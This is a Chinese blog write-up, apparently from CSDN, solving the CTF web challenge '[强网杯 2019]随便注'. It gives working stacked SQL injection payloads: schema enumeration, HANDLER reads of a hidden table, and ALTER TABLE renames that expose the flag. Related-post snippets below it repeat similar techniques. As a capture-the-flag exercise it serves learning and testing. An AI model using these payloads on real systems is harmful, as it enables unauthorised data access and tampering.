[强网杯 2019]随便注 wp

最新推荐文章于 2025-10-20 20:46:58 发布
原创 最新推荐文章于 2025-10-20 20:46:58 发布 · 338 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #web安全

文章详细描述了解决一个SQL注入问题的过程,首先通过1or1=1;#测试注入点,发现是字符型注入且存在正则过滤。接着尝试使用HANDLER语句读取可疑表1919810931114514的内容,以及利用ALTER语句改表名和字段名来达到获取FLAG的目的。最终通过构造特定的SQL语句,绕过过滤并揭示隐藏的数据。

[强网杯 2019]随便注

sql注入老传统,上来先判断注入点,这题是字符型注入

先用1' or 1=1;#判断能出来什么东西,好样的,啥用没有
请添加图片描述

这里想先用union联合注入来获取当前database,但是被过滤了,由这个preg_match正则匹配可以看出这道题是堆叠注入

请添加图片描述

构造payload,来获取各个数据库名:

1';show databases;#

请添加图片描述

发现这并没有啥用,再构造payload来查看表:

?inject=1';show tables;#

请添加图片描述

这个1919810931114514表很可疑,所以我们要查看

因为这道题是堆叠注入,加上有过滤所以离不开handler语句

语法分析:

  • HANDLER tbl_name OPEN; 打开一张表
  • HANDLER tbl_name READ FIRST/NEXT; 获取句柄的第一行,FIRST(第一行)、NEXT(下一行)

例如:1’;handler `1919810931114514` open;handler `1919810931114514` read first;#

注意表名有数字的情况下要用反引号包括起来

所以我们可以构造handled语句,来读取1919810931114514中的内容,exp:

1';handler `1919810931114514` open;handler `1919810931114514` read first;#

方法二:

第二种方法主要是运用alert语句写的,先介绍一下alert语句:

alter语句

修改表名 alter table 表名 rename 新表名;

修改字段名 alter table 表名 change 旧字段名 新字段名 类型;

前面一样,先查出所有表,然后使用show columns from 表名;获取到表中的字段名

?inject=1';show columns from words;#

请添加图片描述

请添加图片描述

然后我们再查看一下1919810931114514这个表中的字段,构造payload:

?inject=1';show columns from `1919810931114514`;#

请添加图片描述

通过观察 words表单有两列, 也就是上面的 1 和 hahahah
我们可以推测 这个表单其实是从words表中以id字段为索引获取到内容 然后返回到前台
并且后台的查询语句为"select * from words where id='".$_GET['inject']."'"

那么 我们是不是可以通过修改带flag字段的表的名字为words表 然后把flag 字段修改为id
通过三条alter语句来修改

  • 修改words表名为其他的

    alter table words rename words1;

  • 修改1919810931114514表名为words

    alter table `1919810931114514` rename words;

  • 修改新的words表中的flag列名为id

    alter table words change flag id varchar(60);

得到最后的payload:

1';alter table words rename words1;alter table `1919810931114514` rename words;alter table words change flag id varchar(60);#

然后刷新页面
请添加图片描述

发现没结果了, 原因是新的id列中的值已经变为flag值了 所以查询inject=1查不到
我们可以通过让where条件永远为正查出来所有数据
构造payload1' or '1'='1, 获取到flag值

请添加图片描述

BUUCTF -web- [强网 2019]随便
qq_44640313的博客
12-14 3197
以buuctf的强网2019为例的堆叠
2024强网Master of OSINT部分wp
2401_82808188的博客
11-05 1434
2024强网Master of OSINT部分wp
【BUUCTF】web强网2019随便
12-14
开始入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里意表名为数字的要加反引号 “ :在上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
2025强网tradRE简单wp
最新发布
sln_1550的博客
10-20 620
本文分享了作者在比赛中的解题经验。由于时间有限,作者采用ptrace分父子进程进行调试,父进程负责调度子进程中的代码片段,实现类似虚拟机的功能。初始使用IDA断点调试效率较低,后改用Python模拟执行流程,显著提升了分析效率。文章提供了详细的Python代码片段,展示了如何通过模拟方式解析内存地址和指令数组,从而快速理解程序逻辑。这种方法既节省了调试时间,又突破了传统调试工具的局限性。
[强网 2019]随便wp
vegetable223的博客
11-28 292
强网2019随便 一看题目就知道这是sql入,只听过没学过,看来这题只能全程跟着大神的思路走了。 1.打开靶机,随便提交,发现似乎是把 PHP 查询的原始结果之间返回了 2.输入 select 发现了过滤语句,过滤了 select,update,delete,drop,insert,where 和 . return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 测试一下有没有入。?inject=1’%23
[强网 2019]随便&[GYCTF2020]Blacklist -wp
freerats的博客
08-01 799
[GYCTF2020]Blacklist算是随便的加版,环境基本一致,不过blacklist禁掉了set和rename,所以随便的两种常规方法都做不了。 一样的堆叠入, 1';show databases;# 1';show tables;# 这里使用的新姿势就是handler …open. handler…open语句打开一个表,使其可以使用后续handler … read语句访问,该表对象未被其他会话共享,并且在会话调用handler … close或会话终止之前不会关闭 也就是说可以直.
BUUCTF-WEB:[强网 2019]随便 1
_Co1a
01-24 1111
题目环境:http://de044ac0-9162-4b83-b6a6-8c99ce0efe91.node3.buuoj.cn 打开环境: 尝试入: 解题思路: 1、先尝试用union联合入:第一步、测试入点(一些小tips:利用引号,and 1=1, or 1=1之类的)判断是字符型还是数字型 1' [error] 1'# [不报错,正常回显] 1' and 1=1# ...
BUUCTF [强网 2019]随便
qq_42158602的博客
01-09 1451
打开题目看见一个输入框 输入’报错 应该是有sql入了 使用 1’ # 正确显示 直接上 order by 1' order by 3 # 测试1,2正常,3报错 此时天真的我以为我已经离成功不远了~~ 启动联合查询 -1' union select 1,2 # 提交 继续 ...
BUUCTF系列 // [强网2019] 随便
qq_45805420的博客
09-23 748
前言 本题知识点:SQL堆叠WP 打开题目,很明显的提示我们应该是SQL入了 So,先按照一般的流程,尝试基本的探测姿势 1. 探测有无入 1' 报错 1'--+ 报错 1'# 正常有回显 1' and 1=1# 正常有回显 1' and 1=2# 正常无回显 可知存在入,且 --+ 释被过滤,# 释可用 2. 尝试获取列数 1' order by 1# 正常有回显 1' order by 2# 正常有回显 1' order by 3# 报错 用 order by
[强网 2019]随便
1ance's blog
11-19 1882
文章目录环境解题思路其他姿势1其他姿势2总结参考 环境 [强网 2019]随便 BUUCTF启动靶机,获取链接 http://2849c7a6-b1b9-417c-8c48-ada29998e57d.node4.buuoj.cn:81/?inject=1 解题思路 访问链接,看到一个输入框。 输入1输出 array(2) { [0]=> string(1) "1" [1]=> string(7) "hahahah" } 输入2输出 array(2) { [0]=&gt
2020强网 部分wp
fly夏天的博客
08-26 1850
2020强网 部分wp 彩笔参加了这次强网,感觉又被扎心,果然是得PWN者得天下。 1. BANK 这题虽然是个PWN,但是居然被我这个web小白做出来了,我感觉我这种做法是个非预期解,也不知道大佬是如何操作的。 首先,远程nc连接,提示解密拼接字符串的sha256加密。编写python脚本爆破。简易脚本如下: import hashlib,os s = 'a36MUMAX1VSQQcEHJ' #伪加密部分字符串 result = 'f8a38643f58bf7d6523d8c43f81a9329d
[强网 2019]随便WP
u011250160的博客
10-13 176
判断入类型 说明是字符类型的入 联合查询入 发现正则匹配过滤了关键词 堆叠查询入 到这里就知道flag了 接下来查询flag的内容 预编译执行语句 说明set与prepare关键词被拦截 strstr函数对大小写敏感 大写绕过 修改表名查询 原题目查询的数据表为words。 既然没过滤 alert 和 rename,那就可以把表和列改名。 先把 words 改为其他,再把1919810931114514改为 words, 然后把新的 words 表里的 flag 列改为 id ,这样
buuctf-web-[强网 2019]随便-wp
居上
06-22 1592
[强网 2019]随便 源码 (这题本身没有源码,源码是我从上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
[强网 2019]随便_wp
Accompany的博客
01-07 633
判断 看到表单提交,第一反应,万能密码,看存不存在SQL入,以及爆开会得到什么 1’ or ‘1’='1 显然存在sql入,其实这个题的题目已经告诉我们了,直接就好 入 判断字段数 当1' order by 3;时 根据回显可判断出字段数为2 但当进行后续操作时,发现过滤了一系列关键字 堆叠入 ...
BUUCTF&[强网 2019]随便(细节详解WP)
Pysnow's Blog
12-09 4587
这道题通过大佬的讲解,终于把其中一些细节操作的原理给理解了一遍,我们看别人的题解,跟要知道这个题解中每一操作的原理,这对我们的提升有非常的作业
随便强网2019
I_WORM的博客
03-31 919
mysql专属,可替代select部分功能这道题中的表名必须用 反引号进行包裹;如`words` `123456`;要不然不识别解题方法使用handler函数进行操作;这里是bp抓包中的payload,所有空格都用+代替了,而且相关特殊符号也用url编码了%23通过修改表名和字段名进行绕过先把表名和字段名修改为界面能显示的字段数据,然后再让界面输出所有数据%23这种方法没做源码如下:(本题无提示,源码自己找的)通过观察源码发现有两层waf。
强网wp
Sentiment的博客
07-22 1207
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 强网wp PWN PWN no_output 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import nu
第二届强网wp
03-29 339
web web签到 利用了md5碰撞 payload为 param1 =%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%6...
强网 2022 谍影重重wp
12-18
强网2022谍影重重WP是我国一项安全竞赛中的一个题目解答。这道题目主要涉及隐写和密码学方面的知识,要求选手解析一段加密信息,并还原出明文信息。 解题过程如下: 首先,选手会得到一段看似普通的文本,但其中隐藏着隐藏着几个不同类型的隐藏信息。选手需要借助隐写分析工具,例如StegSolve,来分析图像中是否含有LSB隐写、色彩分量隐写等信息。此外,选手还要意文字中是否有使用不常见的Unicode字符来隐藏信息。 在找到隐写信息后,接下来是解密密码学部分。选手需要根据提示,使用正确的解密方法对隐藏信息进行还原。可能涉及到的密码学算法有:凯撒密码、栅栏密码、维吉尼亚密码等。需要选手根据密钥或者加密规则,反推出正确的解密方法,并对隐藏信息进行解码。 通过以上步骤,选手最终可以得到明文信息,也就是这道题目的答案。 这道题目整体难度较高,需要选手具备扎实的密码学和隐写学知识,并具有分析和解决问题的能力。参赛选手需要细心观察、耐心分析,才能顺利解答出这个谜题。同时,这道题目也展示了安全竞赛中的一种常见挑战方式,旨在培养选手的思维敏捷性和解决复杂问题的能力。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leafzzz__

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值